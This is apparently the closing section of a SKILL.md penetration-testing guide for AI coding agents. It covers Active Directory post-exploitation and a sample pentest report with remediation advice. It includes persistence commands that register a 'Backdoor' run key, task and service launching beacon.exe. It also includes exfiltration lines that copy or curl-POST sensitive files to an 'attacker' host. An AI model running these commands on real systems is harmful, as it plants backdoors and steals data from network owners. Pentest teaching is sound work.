```

## Post-Exploitation

### Persistence

```powershell
# Registry Run Key (user level)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\beacon.exe"

# Scheduled Task (running as SYSTEM needs admin)
schtasks /create /tn "Updater" /tr "C:\temp\beacon.exe" /sc onlogon /ru SYSTEM

# WMI Event Subscription
# Use PowerLurk or a manual WMI subscription

# Service
sc.exe create Backdoor binpath= "C:\temp\beacon.exe" start= auto

# DLL Hijacking
# Place malicious DLL in application directory

# Golden Ticket (Domain)
# Already covered above
```

### Data Exfiltration

```powershell
# SMB
copy sensitive.docx \\attacker\share\
```

```bash
# HTTP
curl -X POST -F "file=@sensitive.docx" http://attacker/upload

# DNS
# Use dnscat2 or similar

# Compress and encrypt before exfil (-mhe=on also encrypts the file names in the archive header)
7z a -ppassword -mhe=on archive.7z sensitive_folder/
```

## Reporting Template

```markdown
# Internal Network Penetration Test Report

## Executive Summary
- Assessment period: YYYY-MM-DD to YYYY-MM-DD
- Scope: Internal network / Active Directory
- Domain(s) tested: domain.local
- Hosts compromised: X
- Domain admin achieved: Yes/No

## Attack Path Summary
1. Initial access via LLMNR poisoning
2. Cracked NTLMv2 hash for user X
3. Kerberoasted service account Y
4. Lateral movement to server Z
5. DCSync attack for domain dominance

## Critical Findings

### [CRITICAL] LLMNR/NBT-NS Enabled
**Description**: LLMNR and NBT-NS protocols are enabled, allowing credential interception.
**Impact**: Attackers can capture and crack domain credentials.
**Recommendation**: Disable LLMNR and NBT-NS via Group Policy.

### [CRITICAL] Weak Service Account Passwords
**Description**: Service accounts with SPNs have weak passwords vulnerable to Kerberoasting.
**Affected Accounts**: svc_sql, svc_backup
**Recommendation**: Use strong passwords (25+ chars) or gMSA for service accounts.

## Recommendations Priority Matrix
| Priority | Finding | Remediation |
|----------|---------|-------------|
| P1 | LLMNR enabled | Disable via GPO |
| P1 | Weak SPN passwords | Implement gMSA |
| P2 | Unconstrained delegation | Remove unnecessary delegation |
| P2 | Local admin reuse | Implement LAPS |
```

## Bundled Resources

### scripts/

- ad_enum.py - Active Directory enumeration automation
- spray.sh - Safe password spraying with lockout awareness
- bloodhound_queries.md - Custom BloodHound Cypher queries

### references/

- attack_paths.md - Common AD attack paths
- mimikatz_commands.md - Mimikatz command reference
- impacket_cheatsheet.md - Impacket tools cheatsheet

### checklists/

- ad_pentest.md - AD penetration testing checklist
- privesc_windows.md - Windows privilege escalation checklist
- privesc_linux.md - Linux privilege escalation checklist

# Supported AI Coding Agents

This skill is compatible with the SKILL.md standard and works with all major AI coding agents that support it.
